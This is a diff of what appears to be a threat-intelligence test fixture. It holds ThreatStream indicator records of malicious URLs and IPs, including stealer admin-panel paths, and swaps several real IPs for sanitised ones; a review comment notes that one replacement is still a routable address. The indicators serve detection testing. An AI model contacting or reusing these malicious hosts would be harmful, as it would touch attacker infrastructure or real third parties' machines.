'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-22T03:04:59.245Z\"}", "category": "threat", "type": "indicator", 
@@ -2080,7 +2080,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.185.214.199", + "name": "mal_ip: 192.168.214.199", "description": "TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-23T03:00:22.287Z", "valid_from": "2020-01-23T03:00:22.287Z", @@ -2102,12 +2102,12 @@ "first_seen": "2020-01-23T03:00:22.287Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.185.214.199" + "ip": "192.168.214.199" } }, "event": { - "ingested": "2021-12-13T05:57:34.385257427Z", - "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.185.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.185.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", + "ingested": "2021-12-13T08:38:40.022812200Z", + "original": "{\"created\":\"2020-01-23T03:00:22.287Z\",\"description\":\"TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0d3e1bd8-0f16-4c22-b8a1-663ec255ad79\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-57\"],\"modified\":\"2020-01-23T03:00:22.287Z\",\"name\":\"mal_ip: 192.168.214.199\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.214.199']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:00:22.287Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2158,7 +2158,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385261615Z", + "ingested": "2021-12-13T08:38:40.022816900Z", "original": "{\"created\":\"2020-01-23T03:01:11.329Z\",\"description\":\"TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime\",\"id\":\"indicator--2cdd130a-c884-402d-b63c-e03f9448f5d9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-24\"],\"modified\":\"2020-01-23T03:01:11.329Z\",\"name\":\"mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:11.329Z\"}", "category": "threat", "type": "indicator", @@ -2210,7 +2210,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385267366Z", + "ingested": "2021-12-13T08:38:40.022821500Z", "original": "{\"created\":\"2020-01-23T03:01:36.682Z\",\"description\":\"TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--88e98e13-4bfd-4188-941a-f696a7b86b71\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-01-23T03:01:36.682Z\",\"name\":\"mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:01:36.682Z\"}", "category": "threat", "type": "indicator", 
@@ -2262,7 +2262,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385272706Z", + "ingested": "2021-12-13T08:38:40.022825600Z", "original": "{\"created\":\"2020-01-23T03:02:15.854Z\",\"description\":\"TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--27323b7d-85d3-4e89-8249-b7696925a772\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-23T03:02:15.854Z\",\"name\":\"mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:15.854Z\"}", "category": "threat", "type": "indicator", @@ -2313,7 +2313,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385277305Z", + "ingested": "2021-12-13T08:38:40.022829900Z", "original": "{\"created\":\"2020-01-23T03:02:47.364Z\",\"description\":\"TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b0639721-de55-48c6-b237-3859d61aecfb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-23T03:02:47.364Z\",\"name\":\"mal_url: http://f0392261.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392261.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:02:47.364Z\"}", "category": "threat", "type": "indicator", 
@@ -2332,7 +2332,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://104.168.99.168/panel/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/panel/admin.php", "description": "TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-23T03:03:05.048Z", "valid_from": "2020-01-23T03:03:05.048Z", 
@@ -2357,16 +2357,16 @@ "url": { "path": "/panel/panel/admin.php", "extension": "php", - "original": "http://104.168.99.168/panel/panel/admin.php", + "original": "http://89.160.20.156/panel/panel/admin.php", "scheme": "http", - "domain": "104.168.99.168", - "full": "http://104.168.99.168/panel/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385281673Z", - "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://104.168.99.168/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.168.99.168/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", + "ingested": "2021-12-13T08:38:40.022835500Z", + "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://89.160.20.156/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2417,7 +2417,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385286001Z", + "ingested": "2021-12-13T08:38:40.022843300Z", "original": "{\"created\":\"2020-01-23T03:03:15.734Z\",\"description\":\"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-23T03:03:15.734Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:15.734Z\"}", "category": "threat", "type": "indicator", @@ -2469,7 +2469,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385290269Z", + "ingested": "2021-12-13T08:38:40.022850800Z", "original": "{\"created\":\"2020-01-23T03:03:42.599Z\",\"description\":\"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-01-23T03:03:42.599Z\",\"name\":\"mal_url: http://a0386457.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:42.599Z\"}", "category": "threat", "type": "indicator", 
@@ -2521,7 +2521,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385294437Z", + "ingested": "2021-12-13T08:38:40.022858400Z", "original": "{\"created\":\"2020-01-24T02:57:04.821Z\",\"description\":\"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-24T02:57:04.821Z\",\"name\":\"mal_url: http://defenseisrael.com/dis/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://defenseisrael.com/dis/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.821Z\"}", "category": "threat", "type": "indicator", @@ -2540,7 +2540,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.170.249", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-01-24T02:57:04.857Z", "valid_from": "2020-01-24T02:57:04.857Z", 
@@ -2562,12 +2562,12 @@ "first_seen": "2020-01-24T02:57:04.857Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.170.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385298675Z", - "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 91.215.170.249\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.170.249']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", + "ingested": "2021-12-13T08:38:40.022866100Z", + "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2617,7 +2617,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385303153Z", + "ingested": "2021-12-13T08:38:40.022873500Z", "original": "{\"created\":\"2020-01-24T02:57:04.883Z\",\"description\":\"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-24T02:57:04.883Z\",\"name\":\"mal_url: http://lbfb3f03.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.883Z\"}", "category": "threat", "type": "indicator", @@ -2669,7 +2669,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385307231Z", + "ingested": "2021-12-13T08:38:40.022881Z", "original": "{\"created\":\"2020-01-24T02:57:12.997Z\",\"description\":\"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:12.997Z\",\"name\":\"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:12.997Z\"}", "category": "threat", "type": "indicator", 
@@ -2688,7 +2688,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://199.192.28.11/panel/admin.php", + "name": "mal_url: http://199.192.168.11/panel/admin.php", "description": "TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-01-24T02:57:13.025Z", "valid_from": "2020-01-24T02:57:13.025Z", 
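Review bot: The replacement value `199.192.168.11` chosen here (and repeated in the `url.original`, `url.domain`, `url.full` and `event.original` fields of the following `@@ -2713` hunk) is still a globally routable address — putting `168` in the third octet does not move it into RFC 1918 space the way the `192.168.214.199` substitution at `@@ -2080` does. If the commit's intent is that every fixture IP belongs to the supported test set, this entry should either reuse `89.160.20.156` as the other sanitised mal_ip/mal_url records in this file do, or take an address from a documentation range (RFC 5737, e.g. `192.0.2.0/24`) so it can never point at a real host. Whichever literal is picked must be applied to all five occurrences across the two hunks so the indicator fields and `event.original` remain in agreement; the hunks as written do keep them consistent, so only the value itself needs changing.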
@@ -2713,16 +2713,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://199.192.28.11/panel/admin.php", + "original": "http://199.192.168.11/panel/admin.php", "scheme": "http", - "domain": "199.192.28.11", - "full": "http://199.192.28.11/panel/admin.php" + "domain": "199.192.168.11", + "full": "http://199.192.168.11/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385311419Z", - "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.28.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.28.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", + "ingested": "2021-12-13T08:38:40.022886400Z", + "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.168.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.168.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2740,7 +2740,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.51/aW8bVds1/login.php", + "name": "mal_url: http://89.160.20.156/aW8bVds1/login.php", "description": "TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-24T02:57:32.901Z", "valid_from": "2020-01-24T02:57:32.901Z", 
@@ -2765,16 +2765,16 @@ "url": { "path": "/aW8bVds1/login.php", "extension": "php", - "original": "http://217.8.117.51/aW8bVds1/login.php", + "original": "http://89.160.20.156/aW8bVds1/login.php", "scheme": "http", - "domain": "217.8.117.51", - "full": "http://217.8.117.51/aW8bVds1/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/aW8bVds1/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385315827Z", - "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://217.8.117.51/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", + "ingested": "2021-12-13T08:38:40.022890500Z", + "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://89.160.20.156/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -2824,7 +2824,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385320025Z", + "ingested": "2021-12-13T08:38:40.022895900Z", "original": "{\"created\":\"2020-01-24T02:57:32.929Z\",\"description\":\"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:32.929Z\",\"name\":\"mal_url: http://lansome.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lansome.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.929Z\"}", "category": "threat", "type": "indicator", @@ -2876,7 +2876,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385324012Z", + "ingested": "2021-12-13T08:38:40.022903400Z", "original": "{\"created\":\"2020-01-24T02:57:49.028Z\",\"description\":\"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e88008f4-76fc-428d-831a-4b389e48b712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:49.028Z\",\"name\":\"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:49.028Z\"}", "category": "threat", "type": "indicator", 
@@ -2928,7 +2928,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385328280Z", + "ingested": "2021-12-13T08:38:40.022910900Z", "original": "{\"created\":\"2020-01-24T02:58:03.345Z\",\"description\":\"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-24T02:58:03.345Z\",\"name\":\"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:03.345Z\"}", "category": "threat", "type": "indicator", @@ -2980,7 +2980,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385332508Z", + "ingested": "2021-12-13T08:38:40.022918400Z", "original": "{\"created\":\"2020-01-24T02:58:16.318Z\",\"description\":\"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:58:16.318Z\",\"name\":\"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.318Z\"}", "category": "threat", "type": "indicator", 
@@ -3032,7 +3032,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385336806Z", + "ingested": "2021-12-13T08:38:40.022923900Z", "original": "{\"created\":\"2020-01-24T02:58:16.358Z\",\"description\":\"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--4adabe80-3be4-401a-948a-f9724c872374\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-24T02:58:16.358Z\",\"name\":\"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.358Z\"}", "category": "threat", "type": "indicator", @@ -3083,7 +3083,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385341155Z", + "ingested": "2021-12-13T08:38:40.022927600Z", "original": "{\"created\":\"2020-01-24T02:58:32.126Z\",\"description\":\"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:32.126Z\",\"name\":\"mal_url: http://suspiciousactivity.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://suspiciousactivity.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:32.126Z\"}", "category": "threat", "type": "indicator", 
@@ -3102,7 +3102,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.8/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-24T02:58:37.603Z", "valid_from": "2020-01-24T02:58:37.603Z", 
@@ -3126,16 +3126,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://217.8.117.8/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "217.8.117.8", - "full": "http://217.8.117.8/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385345523Z", - "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://217.8.117.8/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.8/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", + "ingested": "2021-12-13T08:38:40.022931700Z", + "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -3185,7 +3185,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385349841Z", + "ingested": "2021-12-13T08:38:40.022936Z", "original": "{\"created\":\"2020-01-24T02:58:37.643Z\",\"description\":\"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--33e674f5-a64a-48f4-9d8c-248348356135\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-24T02:58:37.643Z\",\"name\":\"mal_url: http://f0387550.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387550.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.643Z\"}", "category": "threat", "type": "indicator", @@ -3236,7 +3236,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385354309Z", + "ingested": "2021-12-13T08:38:40.022941300Z", "original": "{\"created\":\"2020-01-24T02:58:39.465Z\",\"description\":\"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: 